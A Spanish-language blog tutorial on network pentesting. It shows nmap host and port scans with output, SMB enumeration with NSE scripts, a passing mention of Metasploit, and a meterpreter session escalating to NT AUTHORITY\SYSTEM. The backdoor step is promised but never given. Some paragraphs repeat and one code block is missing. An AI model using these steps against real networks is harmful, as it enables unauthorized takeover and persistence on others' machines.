
Esto es un escenario importante a la hora de un pentesting en una red, donde tenemos que tener en cuenta algunos puntos como:
1) Como se compone la red
2) Cuantos equipos hay en red
3) Servicios de estos equipos
4) Bug en los nodos
5) Ejecutar exploits
6) Subir privilegios
7) Instalar backdoor
A la hora de hacer una práctica en red es tratar de cumplir, como mínimo, estos estándares, los cuales tienen la finalidad de obtener los mayores nodos y tener la red completa.
A la hora de hacer una práctica en red es tratar de cumplir, como mínimo, estos estándares, los cuales tienen la finalidad de obtener los mayores nodos y tener la red completa.
1) Cómo se compone la red
Hay que tener en cuenta como se compone la estructura de esta red ya sea una lan, wlan u otras.
2) Para esto podemos utilizar similitudes de software pero para averiguar cuántos equipos hay en red la mejor es nmap primero verifico mi IP, esto será plataforma Windows.
2) Para esto podemos utilizar similitudes de software pero para averiguar cuántos equipos hay en red la mejor es nmap primero verifico mi IP, esto será plataforma Windows.
Iniciamos mirando cual es mi ip ya que maneja un DHCP y me asigno una IP.
Código:
Todo de mi ip desde rango 1 hasta 255 para ver los equipos
Como podemos ver existen tres IP activas con sus respectivos servicios.
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
5431/tcp open park-agent
MAC Address: 14:D6:4D:8B:20:42 (Unknown)
Nmap scan report for 192.168.0.4
Host is up (0.0026s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
2869/tcp closed unknown
MAC Address: 00:16:17:A6:A6:F9 (MSI)
Nmap scan report for 192.168.0.5
Host is up (0.0024s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2126/tcp closed unknown
2869/tcp closed unknown
MAC Address: 00:13:8F:8B:3D:4F (Asiarock Incorporation)
De aquí en adelante ya están las maquinas de la red.
3) Mirando aquí los equipos tienen lo mismo de la parte dos pero ahora veremos el tipo de servicio que se ejecuta y su versión un poco OS fingerprint.
Mirando el primer equipo es un router, se sigue mirando información mas detallada.
4) Ya sabiendo que protocolos utilizó miremos mas información ahora con scripts de Nmap.
smb-check-vulns.nse --me dice fallos protocolos
smb-enum-groups.nse -- grupo de usuario
smb-enum-processes.nse -- procesos que utiliza
smb-enum-sessions.nse -- session activa
smb-enum-users.nse -- todos los usuarios
Ok esto se mostraría de la siguiente forma
--script=smb-check-vulns.nse,smb-enum-users.nse,smb-enum-sessions.nse,smb-enum-groups.nse,smb-enum-processes.nse
Como vemos tenemos información detallada para el pentest.
5) Por ultimo con metasploit es vulnerable a protocolo SMB
Ahora la finalidad es subir todos los privilegios que pueda obtener para instalar backdoor.
6) Subir privilegios
Para esto haremos lo siguiente
meterpreter> use priv
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)
Como se puede apreciar existen diferentes técnicas empleadas por la extensión priv para elevar los privilegios de la consola actual, se puede utilizar una de las técnicas o todas, si no se especifica ningún parámetro ningún parámetro se utilizan todas.
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
6) La instalación del backdoor se las debo por que en estos momentos no lo tengo a mano.
Muchas gracias a la entrada de Inp3nt3zt3 su contacto es p3ngohz@hotmail.com si tienen dudas o desean mas información.






0 comentarios:
Publicar un comentario